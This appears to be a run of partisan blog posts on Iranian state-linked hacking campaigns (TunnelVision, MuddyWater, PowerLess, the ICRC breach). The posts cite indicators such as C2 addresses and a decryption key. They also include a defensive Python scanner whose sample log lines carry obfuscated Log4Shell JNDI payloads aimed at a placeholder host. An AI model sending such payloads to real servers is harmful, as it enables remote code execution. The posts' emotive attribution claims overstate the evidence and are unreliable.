Saturday, February 26, 2022

Is TunnelVision a NEW hacking group controlled by Iranian State???


TunnelVision: a new Iranian state actor

Sentinel Labs reports that a potential new Iranian hacking group called TunnelVision has been discovered! They are called TunnelVision because of their constant and excessive reliance on tunneling tools to achieve their evil goals. TunnelVision has been caught exploiting the Log4j vulnerability to gain backdoor access to VMware Horizon.


PowerShell code used to perform the exploit

TunnelVision has been spotted exploiting the Fortinet FortiOS vulnerability CVE-2018-13379, the Microsoft Exchange vulnerability ProxyShell and, most recently, Log4j. It was easy for Sentinel Labs to attribute this activity to TunnelVision because every time they exploited an innocent victim they used the same distinctive way of tunneling to do so. They relied heavily on Fast Reverse Proxy Client (FRPC) and Plink to commit their crimes.


PowerShell code used for reverse shells

TunnelVision uses the Log4j exploit to run malicious commands from the Tomcat.exe executable in VMware Horizon, and then uses the tunneling server 142.44.135[.]86 to link up to a lot of C2 servers, for example hxxp://google.onedriver-srv.ml/gadfTs55sghsSSS.
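As an added defensive example (not code from the Sentinel Labs report or from this blog), the following Python scans constructed web-server access log lines, like the ones a Tomcat front end for Horizon records, for Log4Shell JNDI lookups. It URL-decodes each line and strips the common `${lower:}` / `${::-}` lookup obfuscations before matching, so the disguised variants are caught too. The sample lines and the 203.0.113.x addresses are constructed for the example.

```python
import re
import urllib.parse

# Constructed access log lines (not real traffic): lines 2-4 carry JNDI lookups,
# the third is obfuscated with nested lookups and the fourth is percent-encoded.
SAMPLE_LINES = [
    '10.0.0.5 - - [26/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [26/Feb/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [26/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://203.0.113.10/b}"',
    '10.0.0.9 - - [26/Feb/2022:10:01:09 +0000] "GET /portal/?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# ${lower:x} / ${upper:x} and the default-value trick ${anything:anything:-x} both
# collapse to the single character x when Log4j evaluates them.
OBFUSCATION = re.compile(r"\$\{(?:lower|upper):([^{}])\}|\$\{[^{}:]*:[^{}:]*:-([^{}])\}")
# A JNDI lookup with its protocol (ldap, ldaps, rmi, dns, ...) after normalisation.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):[^}]*\}?")


def normalize(value: str) -> str:
    """URL-decode (bounded, attackers stack encodings), lowercase, unwrap obfuscation."""
    s = value
    for _ in range(3):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.lower()  # Log4j lookup prefixes are case-insensitive, so ${JNDI:...} counts too
    for _ in range(10):  # nested wrappers unwrap one layer per pass
        unwrapped = OBFUSCATION.sub(lambda m: m.group(1) or m.group(2), s)
        if unwrapped == s:
            break
        s = unwrapped
    return s


def scan_log(lines):
    """Return one finding per log line that carries a JNDI lookup after normalisation."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        match = JNDI.search(normalize(raw))
        if match:
            findings.append({"line": number, "protocol": match.group(1), "lookup": match.group(0)})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LINES):
        print(f"line {hit['line']}: {hit['protocol']} lookup {hit['lookup']}")
```

The normalisation covers the obfuscations seen most often in the wild; a full Log4j lookup evaluator (`${env:...}`, `${sys:...}`, `${date:...}`) is not attempted here.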

Sentinel Labs also says that TunnelVision could be Charming Kitten, AKA Nemesis Kitten, AKA APT35, trying out a new evil hacking method, but it is not clear if this is the case at this time.

When will this regime stop meddling?? 🙄🙄

Monday, February 21, 2022

Iran behind hack of Red Cross?? 😱 🏥


Iranian Regime hacking Red Cross! 


Hello my friends 🙏

It has been reported that the International Committee of the Red Cross (ICRC) has been hacked and that Iran was behind it.

The ICRC went public on January 19th 2022, stating that its servers had been hacked and that the personal records of over half a million people receiving aid from the Red Cross had been affected. These extremely vulnerable people are all linked to the Restoring Family Links section of the Red Cross, but the Iranian regime has proven it doesn't care about human rights anyway.

The hack itself occurred on November 9th 2021, exploiting the CVE-2021-40539 vulnerability in ADSelfService Plus. When the ICRC went public with this news in January, a cyber actor called Sheriff went onto Raid Forums and tried to sell the leaked dataset. The email account Sheriff used to register on Raid Forums was kelvinmiddelkoop@hotmail.com, which was named in court documents linked to an Iranian disinformation media campaign, which proves the regime's guilt.

Sheriff also seemed to suggest that a ransom attempt had been made against the ICRC, stating: "Mr. Mardini, your words have been heard. Check your email and send a figure you can pay." Mr. Mardini is the Director-General of the ICRC. The ICRC states that it has never had any contact with the people who hacked its servers.

Sheriff is also trying to buy the penetration testing tool Cobalt Strike, offering $3000 for a cracked version. Sheriff was referred to Raid Forums by Pompompurin, who says: "I know who sheriff is but im not saying anything."



Account of Sheriff on Raid Forums

It is evident that not only does this cruel and Evil regime like to prey on people who are desperate and vulnerable, but that they also want to hack even more people by getting Cobalt Strike. Please my friends, ensure that all your software is patched and up to date.

Thursday, February 17, 2022

Iranian Hacking Group MuddyWater targeting Turkish Hospitals! 😠 Using Malicious PDF and XLS files to execute PowerShell Scripts



Cisco Talos reports that the Iranian-backed hacking group MuddyWater, AKA MERCURY, AKA Static Kitten, has been caught in another hacking campaign, this time targeting Turkish hospitals 😡 and other government departments in Turkey. The campaign used malicious PDF and XLS files with embedded VBA macros. These macros contain destructive VBA and PowerShell scripts that run and allow MuddyWater to access the victim's system via C2.😤😤

Another high-profile target of this MuddyWater campaign was TUBITAK, the Scientific and Technological Research Council of Turkey. The PDFs and XLS files were hosted on a domain named snapfile.org and were social-engineered to lure victims in, like the example below.


Example of a malicious PDF file MuddyWater attacks victims with

Malicious files were also given the names of legitimate files in order to masquerade as the Turkish Health Department.


Malicious XLS files posted with fake names by MuddyWater

The embedded VBA and PowerShell scripts are then executed from the file, download further PowerShell modules and infect the victim's system. Every VBA macro also included a registry key. The VBA macro and the first PowerShell script then download a second PowerShell script that gives MuddyWater C2 capability.


Malicious PowerShell script

Talos was able to tell MuddyWater was behind this attack due to sloppy behavior by the group. One of the IP addresses used for the C2 server had already been used by MuddyWater in January 2021. They are also using tracking tokens from Canary Tokens to see how many systems are affected. They also need to use a LOLBin to be able to execute the PowerShell script.

Turkey has been an Ally to this regime supporting Hamas! and now they target a Hospital? This extent of Evil in this regime knows no bounds!! 👺👺👺

Saturday, February 12, 2022

Iranian Hacking Group Phosphorus AKA APT35 AKA Charming Kitten causing DESTRUCTION again!! Using new PowerShell backdoor and Memento Ransomware 🦠️🦠️


Iranian hacking group Phosphorus, also known as APT35 and Charming Kitten

Cybereason reports that the Iranian hacking group Phosphorus, also known as APT35 and Charming Kitten, has been looking to cause damage and chaos to innocent people again, this time using the Microsoft Exchange Server vulnerability ProxyShell as well as a new stealthy PowerShell backdoor called PowerLess.

PowerLess is highly modular malware that connects to a C2 server controlled by Phosphorus and is then used to steal browser data and perform keylogging, as well as a whole host of other malicious actions.

A technical inspection revealed that first a malicious file called windowsprocesses.exe was executed and then a new file called dll.dll was loaded. This DLL file is probably inspired by code on GitHub by farzinenddo, which runs PowerShell with the CLR. dll.dll is a .NET AES decoder with the encryption key () * & 3dCfabE2 / 123, which decrypts a file called upc. upc is then used to run the latest malicious PowerShell script, called PowerLess.

PowerLess malicious code

In an interesting turn of events, it seems that Charming Kitten is also behind the devastating Memento ransomware, as an IP address used for the C2 server found in the PowerLess code is also being used for Memento!

Phosphorus, also known as APT35 and Charming Kitten, must be stopped! 😤

Friday, February 4, 2022

Iranian Regime broadcaster IRIB HACKED AGAIN for second time: Hacker Group Edaalate-Ali URGE Iranians to protest against wicked regime!

RadioFarda reports that the broadcaster IRIB, which is responsible for most of the regime's propaganda, was hacked for the second time in a week, this time by the hacker group Edaalate-Ali.

While millions of Iranians were watching the Iranian national team play against the UAE on Telewebion, IRIB's web streaming service, a 50-second explosive video interrupted play, urging Iranians to protest against Khamenei's wicked regime during the Fajr Decade. The Fajr Decade is an 11-day so-called celebration of the 1979 revolution that takes place every year between February 1 and February 11.


Hacker Group Edaalate-Ali 

This was the SECOND time in a week that IRIB was hacked. On January 27 I reported that IRIB was hacked and a 10-second video was shown live on Channel 1, with quotes from the video saying "Death to Khamenei!"


My tweet on first IRIB hack

It is clear that the Iranian people have had enough of this corrupt Iranian regime! Protest and uprising will win! 🙌🙌

Tuesday, February 1, 2022

FBI warns Iranian hackers Emennet Pasargad pose ENORMOUS threat

Emennet Pasargad, Iranian hacker group

The FBI recently announced that Emennet Pasargad, an Iranian hacker group that successfully posed as the far-right US political group Proud Boys in the 2020 US presidential election, is now a much bigger threat than it initially was.

In a notification alert, the FBI warns that Emennet Pasargad does far more than run false-information campaigns, because new research shows that they are using common cyber exploitation tactics. Emennet Pasargad uses VPN services such as TorGuard and CyberGhost to execute attacks. They then look for businesses in the United States, Europe and the Middle East and scan for vulnerabilities and shared hosting services to misuse. Emennet Pasargad seems to want to find PHP web pages and MySQL databases that allow external access. phpMyAdmin is one of Emennet Pasargad's favorites, as are WordPress and Tomcat. It has been confirmed that Emennet Pasargad uses Shodan and SQLMap to brutally exploit innocent businesses.

phpMyAdmin, a favorite target of Emennet Pasargad

Please protect your friends from this evil group. Make sure all systems that interact with WordPress, PHP or MySQL are patched and running the latest updates. Do not be abused by this group! 😤